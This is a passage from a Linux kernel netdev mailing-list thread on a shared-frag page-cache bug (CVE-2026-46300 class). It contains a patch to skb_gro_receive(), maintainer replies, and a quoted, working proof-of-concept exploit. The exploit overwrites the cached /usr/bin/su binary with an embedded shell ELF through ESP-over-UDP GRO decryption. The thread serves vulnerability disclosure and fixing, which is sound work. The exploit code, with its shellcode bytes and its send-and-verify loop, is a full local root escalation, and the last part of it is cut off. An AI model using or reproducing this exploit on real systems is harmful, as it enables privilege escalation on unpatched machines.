	if_up(VETH0); add_addr(VETH0, ADDR_SRC);
	ethtool_set(VETH0, ETHTOOL_STSO, 0);
	ethtool_set(VETH0, ETHTOOL_SGSO, 0);

	/*
	 * Add a netem delay on the sender veth so both datagrams sit in the
	 * qdisc until the timer fires, then get released into veth_xmit()
	 * within the same softirq context. This guarantees both land in one
	 * NAPI poll cycle for GRO to merge them, without needing sysfs
	 * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the
	 * init namespace). tc uses netlink with ns_capable(), so it works
	 * from a user namespace.
	 */
	if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0)
		gate_fail("tc netem");
	usleep(50000);

	sync_read(p_rdy[0]); close(p_rdy[0]);

	int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
	if (sock < 0) die("socket");
	struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
	struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
	inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr);
	inet_pton(AF_INET, ADDR_DST, &da.sin_addr);
	bind(sock, (struct sockaddr *)&sa, sizeof(sa));
	connect(sock, (struct sockaddr *)&da, sizeof(da));

	int target_fd = open(target_file, O_RDONLY | O_CLOEXEC);
	if (target_fd < 0) die("open target");

	uint32_t seq = 1;
	size_t total_changed = 0;
	int delay_ms = 20;
	int sleep_us = 40000;
	struct timespec last_ok;
	clock_gettime(CLOCK_MONOTONIC, &last_ok);

	printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN);

	/* Warmup: send a dummy pair to prime the netem/NAPI path */
	{
		unsigned char w[16 + SPLICE_LEN];
		memset(w, 0, sizeof(w));
		store_be32(w, ESP_SPI);
		store_be32(w + 4, seq++);
		send(sock, w, sizeof(w), 0);
		store_be32(w + 4, seq++);
		send(sock, w, sizeof(w), 0);
		usleep(sleep_us);
	}

	for (int pass = 0; ; pass++) {
		size_t pass_changed = 0, remaining = 0;

		for (int idx = 0; idx < PAYLOAD_LEN; idx++) {
			unsigned char cur = read_byte_at(target_fd, idx);
			if (cur == shell_elf[idx])
				continue;
			remaining++;

			unsigned char need_ks = cur ^ shell_elf[idx];
			uint16_t nonce = stream_nonce[need_ks];
			unsigned char iv[8];
			memset(iv, 0xcc, sizeof(iv));
			store_be32(iv + 4, nonce);

			unsigned char hdr[16];
			char hp[] = "/tmp/fgro-XXXXXX";
			int hfd = mkstemp(hp); unlink(hp);
			store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++);
			memcpy(hdr + 8, iv, 8);
			write(hfd, hdr, 16);

			int pfd[2];
			pipe(pfd);
			loff_t ho = 0;
			splice(hfd, &ho, pfd[1], NULL, 16, 0);
			loff_t so = (loff_t)idx;
			splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0);
			close(hfd);

			unsigned char p1[16 + SPLICE_LEN];
			store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++);
			memcpy(p1 + 8, iv, 8);
			memset(p1 + 16, 0x41, SPLICE_LEN);
			send(sock, p1, sizeof(p1), 0);

			int cork = 1;
			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
			splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0);
			cork = 0;
			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
			close(pfd[0]); close(pfd[1]);

			usleep(sleep_us);

			unsigned char got = read_byte_at(target_fd, idx);
			if (got == shell_elf[idx]) {
				total_changed++;
				pass_changed++;
				clock_gettime(CLOCK_MONOTONIC, &last_ok);
				printf("\r[+] byte %3d/%-3d  0x%02x -> 0x%02x  ok  (%zu changed)",
				       idx, PAYLOAD_LEN, cur, got, total_changed);
			} else {
				printf("\r[-] byte %3d/%-3d  0x%02x -> 0x%02x (want 0x%02x) MISS",
				       idx, PAYLOAD_LEN, cur, got, shell_elf[idx]);
			}
			fflush(stdout);
		}

		if (remaining == 0)
			break;

		size_t still_wrong = 0;
		for (int idx = 0; idx < PAYLOAD_LEN; idx++)
			if (read_byte_at(target_fd, idx) != shell_elf[idx])
				still_wrong++;

		if (still_wrong == 0)
			break;

		struct timespec now;
		clock_gettime(CLOCK_MONOTONIC, &now);
		long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 +
			       (now.tv_nsec - last_ok.tv_nsec) / 1000000;
		if (elapsed > 30000) {
			printf("\n[!] %zu bytes stuck after 30s without progress\n",
			       still_wrong);
			break;
		}

		if (delay_ms < 500) {
			delay_ms = delay_ms < 250 ? delay_ms * 2 : 500;
			sleep_us = delay_ms * 2000;
			char cmd[128];
			snprintf(cmd, sizeof(cmd),
				 "tc qdisc change dev " VETH0 " root netem delay %dms",
				 delay_ms);
			system(cmd);
		}
		printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n",
		       pass + 1, pass_changed, still_wrong, delay_ms);
		fflush(stdout);
	}

	close(target_fd);
	close(sock);
	kill(rx, SIGTERM);
	waitpid(rx, NULL, 0);

	/* Final verification: count how many bytes match shell_elf */
	int final_fd = open(target_file, O_RDONLY | O_CLOEXEC);
	size_t matching = 0;
	if (final_fd >= 0) {
		for (int i = 0; i < PAYLOAD_LEN; i++)
			if (read_byte_at(final_fd, i) == shell_elf[i])
				matching++;
		close(final_fd);
	}

	printf("\n\n");
	if (total_changed > 0) {
		printf("VULNERABLE: %zu/%d payload bytes now match shell_elf "
		       "(%zu written via GRO flag-strip)\n",
		       matching, PAYLOAD_LEN, total_changed);
		_exit(1);
	}

	printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN);
	_exit(0);
}

[-- Attachment #3: 0001-net-gro-propagate-SKBFL_SHARED_FRAG-in-skb_gro_recei.patch --]
[-- Type: text/plain, Size: 3337 bytes --]

From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001
From: Sultan Alsawaf <sultan@kerneltoast.com>
Date: Wed, 13 May 2026 21:47:51 -0700
Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive()

skb_gro_receive() moves frag descriptors from the incoming skb to the
GRO accumulator through two frag-transfer paths (the direct frag-move
loop and the head_frag + memcpy path) without propagating the
SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a
result, the accumulator ends up holding references to externally owned
or page-cache-backed pages while reporting skb_has_shared_frag() as
false.

This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net:
skbuff: propagate shared-frag marker through frag-transfer helpers"),
which fixed the identical omission in __pskb_copy_fclone(),
skb_try_coalesce(), and skb_shift(). skb_gro_receive() was missed in
that fix since it lives in net/core/gro.c rather than net/core/skbuff.c.

The impact is observable through ESP-over-UDP with UDP GRO: splice()
attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via
ip_append_page(). When two such datagrams are GRO-merged via
skb_gro_receive(), the flag is dropped. After udp_rcv_segment()
re-segments the merged GSO skb, the fresh segments carry the
page-cache frags without the shared-frag marker. esp_input() then sees
!skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast
path, decrypting in place over the page-cache pages. Because AES-GCM
CTR decryption runs before the authentication tag is verified, the
page cache is corrupted even though the tag check subsequently fails.

Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the
accumulator in both frag-transfer paths, matching what the skbuff.c
helpers already do. The third path (frag_list merge at the "merge:"
label) chains the entire incoming skb onto the accumulator's frag_list
without moving individual frag descriptors, so each sub-skb retains
its own flags and no propagation is needed there.

Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
Cc: stable@vger.kernel.org
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com>
---
 net/core/gro.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/net/core/gro.c b/net/core/gro.c
index 31d21de5b15a7..4ac41ced13aeb 100644
--- a/net/core/gro.c
+++ b/net/core/gro.c
@@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
 		skb_frag_off_add(frag, offset);
 		skb_frag_size_sub(frag, offset);
 
+		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
+
 		/* all fragments truesize : remove (head size + sk_buff) */
 		new_truesize = SKB_TRUESIZE(skb_end_offset(skb));
 		delta_truesize = skb->truesize - new_truesize;
@@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
 		memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags);
 		/* We dont need to clear skbinfo->nr_frags here */
 
+		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
+
 		new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff));
 		delta_truesize = skb->truesize - new_truesize;
 		skb->truesize = new_truesize;
-- 
2.54.0


^ permalink raw reply related	[flat|nested] 6+ messages in thread

* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
  2026-05-14  6:18 ` Sultan Alsawaf
@ 2026-05-14  8:04 ` Paolo Abeni
  2026-05-14  9:38   ` Hyunwoo Kim
  1 sibling, 1 reply; 6+ messages in thread
From: Paolo Abeni @ 2026-05-14  8:04 UTC (permalink / raw)
  To: Hyunwoo Kim, kuba, steffen.klassert
  Cc: netdev, stable, mhal, davem, horms, edumazet, kerneljasonxing,
	herbert, vakzz, kuniyu, jiayuan.chen, ben, dsahern,
	Sabrina Dubroca

On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> skb_shinfo()->flags when moving frags from source to destination.
> __pskb_copy_fclone() defers the rest of the shinfo metadata to
> skb_copy_header() after copying frag descriptors, but that helper
> only carries over gso_{size,segs,type} and never touches
> skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> descriptors directly and leave flags untouched.  As a result, the
> destination skb keeps a reference to the same externally-owned or
> page-cache-backed pages while reporting skb_has_shared_frag() as
> false.
> 
> The mismatch is harmful in any in-place writer that uses
> skb_has_shared_frag() to decide whether shared pages must be detoured
> through skb_cow_data().  ESP input is one such writer (esp4.c,
> esp6.c), and a single nft 'dup to <local>' rule -- or any other
> nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> skb in esp_input() with the marker stripped, letting an unprivileged
> user write into the page cache of a root-owned read-only file via
> authencesn-ESN stray writes.
> 
> Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> were actually moved from the source.  skb_copy() and skb_copy_expand()
> share skb_copy_header() too but linearize all paged data into freshly
> allocated head storage and emerge with nr_frags == 0, so
> skb_has_shared_frag() returns false on its own; they need no change.
> 
> Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")

WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need
additionally/instead a follow-up similar to the one mentioned by Jakub here:

https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/

/P


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-14  6:18 ` Sultan Alsawaf
@ 2026-05-14  9:23   ` Hyunwoo Kim
  0 siblings, 0 replies; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-14  9:23 UTC (permalink / raw)
  To: Sultan Alsawaf
  Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
	mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
	dsahern, netdev, stable, imv4bel

On Wed, May 13, 2026 at 11:18:10PM -0700, Sultan Alsawaf wrote:
> On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote:
> > Changes in v2:
> > - Also propagate SHARED_FRAG in skb_shift()
> > - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/
> 
> Hi Hyunwoo,
> 
> I've been working on mitigating this vulnerability as a member of the kernel
> team at CIQ, a distro vendor. In particular, we wanted to make sure that there
> weren't any lingering places missing SHARED_FRAG propagation.
> 
> To that end, I used Claude to discover that skb_gro_receive() remained unpatched
> (as you pointed out in the v1 thread). And then I generated a PoC exploiting the
> vulnerable skb_gro_receive() path.
> 
> The PoC is a modified version of the original fragnesia PoC. It works 100% of
> the time, just like the original fragnesia PoC.
> 
> I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a
> look at them.
> 
> Thanks,
> Sultan

Nice catch. Thank you.

After testing, I plan to merge your patch with v2 into a single patch (not a 
series) and submit it as v3. I would appreciate it if you could then add an 
appropriate credit tag of your own.

Also, I would appreciate it if you could use AI to explore additional 
propagation variant paths. From my own analysis, no further ones have been 
identified.


Best regards,
Hyunwoo Kim


> /*
>  * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC
>  *
>  * Drop-in replacement for the espintcp fragnesia variant, targeting the same
>  * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the
>  * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way
>  * the original fragnesia does.
>  *
>  * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so
>  * each ESP decrypt corrupts exactly ONE target byte with no collateral damage.
>  * A precomputed IV table selects the AES-GCM keystream byte that XORs the
>  * current file content to the desired shell_elf byte.
>  *
>  * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim.
>  *
>  * Build:
>  *   gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro
>  *
>  * Run (as root):
>  *   ./fragnesia-gro
>  *
>  * Exit codes:
>  *   1: vulnerable (page cache mutated through GRO flag-strip path)
>  *   0: fixed (byte unchanged)
>  *   2: local setup or argument error
>  *   4: namespace/veth gate closed
>  */
> 
> #define _GNU_SOURCE
> 
> #include <arpa/inet.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <limits.h>
> #include <net/if.h>
> #include <netinet/in.h>
> #include <sched.h>
> #include <signal.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/ioctl.h>
> #include <sys/mount.h>
> #include <sys/socket.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <time.h>
> #include <sys/wait.h>
> #include <unistd.h>
> #include <linux/bpf.h>
> #include <linux/if_addr.h>
> #include <linux/if_alg.h>
> #include <linux/netlink.h>
> #include <linux/xfrm.h>
> 
> /* ---- compat defines ---- */
> 
> #ifndef NLA_ALIGNTO
> #define NLA_ALIGNTO 4
> #endif
> #define NLA_ALIGN(len)  (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))
> #ifndef NLA_HDRLEN
> #define NLA_HDRLEN      ((int)NLA_ALIGN(sizeof(struct nlattr)))
> #endif
> #ifndef RTM_NEWLINK
> #define RTM_NEWLINK 16
> #endif
> #ifndef RTM_NEWADDR
> #define RTM_NEWADDR 20
> #endif
> #ifndef NETLINK_ROUTE
> #define NETLINK_ROUTE 0
> #endif
> #ifndef NETLINK_XFRM
> #define NETLINK_XFRM 6
> #endif
> #ifndef IFLA_IFNAME
> #define IFLA_IFNAME 3
> #endif
> #ifndef IFLA_LINKINFO
> #define IFLA_LINKINFO 18
> #endif
> #ifndef IFLA_INFO_KIND
> #define IFLA_INFO_KIND 1
> #endif
> #ifndef IFLA_INFO_DATA
> #define IFLA_INFO_DATA 2
> #endif
> #ifndef VETH_INFO_PEER
> #define VETH_INFO_PEER 1
> #endif
> #ifndef IFLA_NET_NS_PID
> #define IFLA_NET_NS_PID 19
> #endif
> #ifndef IFA_LOCAL
> #define IFA_LOCAL 2
> #endif
> #ifndef IFA_ADDRESS
> #define IFA_ADDRESS 1
> #endif
> #ifndef NLA_F_NESTED
> #define NLA_F_NESTED (1 << 15)
> #endif
> #ifndef ETHTOOL_SGRO
> #define ETHTOOL_SGRO 0x0000002c
> #endif
> #ifndef ETHTOOL_STSO
> #define ETHTOOL_STSO 0x0000001f
> #endif
> #ifndef ETHTOOL_SGSO
> #define ETHTOOL_SGSO 0x00000024
> #endif
> #ifndef SIOCETHTOOL
> #define SIOCETHTOOL 0x8946
> #endif
> #ifndef UDP_ENCAP
> #define UDP_ENCAP 100
> #endif
> #ifndef UDP_ENCAP_ESPINUDP
> #define UDP_ENCAP_ESPINUDP 2
> #endif
> #ifndef UDP_GRO
> #define UDP_GRO 104
> #endif
> #ifndef UDP_CORK
> #define UDP_CORK 1
> #endif
> #ifndef AF_ALG
> #define AF_ALG 38
> #endif
> #ifndef SOL_ALG
> #define SOL_ALG 279
> #endif
> #ifndef ALG_SET_KEY
> #define ALG_SET_KEY 1
> #endif
> #ifndef ALG_SET_OP
> #define ALG_SET_OP 3
> #endif
> #ifndef ALG_OP_ENCRYPT
> #define ALG_OP_ENCRYPT 1
> #endif
> #ifndef IFLA_XDP
> #define IFLA_XDP 43
> #endif
> #ifndef IFLA_XDP_FD
> #define IFLA_XDP_FD 1
> #endif
> #ifndef IFLA_XDP_FLAGS
> #define IFLA_XDP_FLAGS 3
> #endif
> #ifndef XDP_FLAGS_SKB_MODE
> #define XDP_FLAGS_SKB_MODE (1U << 1)
> #endif
> 
> struct rtnl_ifinfomsg {
> 	unsigned char  ifi_family;
> 	unsigned char  __ifi_pad;
> 	unsigned short ifi_type;
> 	int            ifi_index;
> 	unsigned int   ifi_flags;
> 	unsigned int   ifi_change;
> };
> 
> /* ---- constants ---- */
> 
> #define VETH0       "veth0"
> #define VETH1       "veth1"
> #define ADDR_SRC    "10.0.0.1"
> #define ADDR_DST    "10.0.0.2"
> #define UDP_PORT    4500
> #define ESP_SPI     0x100
> #define ICV_LEN     16
> #define PAYLOAD_LEN 192
> /*
>  * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into
>  * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With
>  * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted.
>  */
> #define SPLICE_LEN  (1 + ICV_LEN)
> 
> static const unsigned char xfrm_key[20] = {
> 	0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
> 	0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff,
> 	0x01, 0x02, 0x03, 0x04
> };
> 
> static const uint8_t shell_elf[PAYLOAD_LEN] = {
> 	0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
> 	0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
> 	0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
> 	0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
> 	0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
> 	0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
> 	0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> };
> 
> static const char *target_file = "/usr/bin/su";
> 
> /* ---- utility ---- */
> 
> static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); }
> static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); }
> 
> static void store_be32(unsigned char *p, uint32_t v)
> {
> 	p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
> }
> 
> static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); }
> static void sync_read(int fd)  { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); }
> 
> static unsigned char read_byte_at(int fd, off_t off)
> {
> 	unsigned char b;
> 	if (pread(fd, &b, 1, off) != 1) die("pread");
> 	return b;
> }
> 
> /* ---- netlink helpers ---- */
> 
> static int nl_ack_errno(char *buf, ssize_t len)
> {
> 	struct nlmsghdr *nlh;
> 	for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len);
> 	     nlh = NLMSG_NEXT(nlh, len)) {
> 		if (nlh->nlmsg_type == NLMSG_ERROR) {
> 			struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh);
> 			if (e->error == 0) return 0;
> 			errno = -e->error;
> 			return -1;
> 		}
> 	}
> 	errno = EPROTO;
> 	return -1;
> }
> 
> static void add_nlattr(struct nlmsghdr *nlh, size_t max,
> 		       unsigned short type, const void *data, size_t len)
> {
> 	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
> 	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
> 	if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
> 	nla->nla_type = type;
> 	nla->nla_len = NLA_HDRLEN + len;
> 	memcpy((char *)nla + NLA_HDRLEN, data, len);
> 	nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len);
> }
> 
> static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type)
> {
> 	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
> 	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
> 	if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
> 	nla->nla_type = type;
> 	nla->nla_len = NLA_HDRLEN;
> 	nlh->nlmsg_len = off + NLA_HDRLEN;
> 	return nla;
> }
> 
> static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla)
> {
> 	nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla);
> }
> 
> static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label)
> {
> 	struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
> 	char resp[4096];
> 	int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto);
> 	if (fd < 0) gate_fail(label);
> 	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
> 	memset(&sa, 0, sizeof(sa));
> 	sa.nl_family = AF_NETLINK;
> 	if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
> 	ssize_t r = recv(fd, resp, sizeof(resp), 0);
> 	if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label);
> 	close(fd);
> }
> 
> /* ---- network setup ---- */
> 
> static void if_up(const char *name)
> {
> 	struct ifreq ifr = {};
> 	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 	if (fd < 0) gate_fail("socket");
> 	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
> 	if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name);
> 	ifr.ifr_flags |= IFF_UP;
> 	if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name);
> 	close(fd);
> }
> 
> static void create_veth(void)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
> 	nlh->nlmsg_type = RTM_NEWLINK;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
> 	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1);
> 	struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED);
> 	add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5);
> 	struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED);
> 	struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED);
> 	{ size_t o = NLMSG_ALIGN(nlh->nlmsg_len);
> 	  memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg));
> 	  nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); }
> 	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1);
> 	nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li);
> 	nl_talk(nlh, NETLINK_ROUTE, "create veth");
> }
> 
> static void move_to_netns(const char *name, pid_t pid)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	uint32_t ns_pid = (uint32_t)pid;
> 	unsigned int idx = if_nametoindex(name);
> 	if (!idx) gate_fail("if_nametoindex");
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
> 	nlh->nlmsg_type = RTM_NEWLINK;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
> 	add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid));
> 	nl_talk(nlh, NETLINK_ROUTE, "move veth");
> }
> 
> static void add_addr(const char *name, const char *addr)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	struct in_addr a;
> 	unsigned int idx = if_nametoindex(name);
> 	if (!idx) gate_fail("if_nametoindex");
> 	inet_pton(AF_INET, addr, &a);
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg));
> 	nlh->nlmsg_type = RTM_NEWADDR;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
> 	struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh);
> 	ifa->ifa_family = AF_INET;
> 	ifa->ifa_prefixlen = 24;
> 	ifa->ifa_index = idx;
> 	add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a));
> 	add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a));
> 	nl_talk(nlh, NETLINK_ROUTE, "add addr");
> }
> 
> static void ethtool_set(const char *name, uint32_t cmd, uint32_t data)
> {
> 	struct ifreq ifr = {};
> 	struct { uint32_t cmd; uint32_t data; } val = { cmd, data };
> 	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 	if (fd < 0) return;
> 	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
> 	ifr.ifr_data = (void *)&val;
> 	ioctl(fd, SIOCETHTOOL, &ifr);
> 	close(fd);
> }
> 
> /* ---- XDP attach/detach for NAPI init ---- */
> 
> static void xdp_toggle(const char *name, int prog_fd, uint32_t flags)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	unsigned int idx = if_nametoindex(name);
> 	if (!idx) return;
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
> 	nlh->nlmsg_type = RTM_NEWLINK;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
> 	struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED);
> 	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd));
> 	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags));
> 	nest_end(nlh, x);
> 	nl_talk(nlh, NETLINK_ROUTE, "xdp");
> }
> 
> static void enable_veth_napi(const char *name)
> {
> 	struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; };
> 	struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } };
> 	struct { uint32_t t; uint32_t c; uint64_t i; uint64_t l;
> 		 uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {};
> 	static const char lic[] = "GPL";
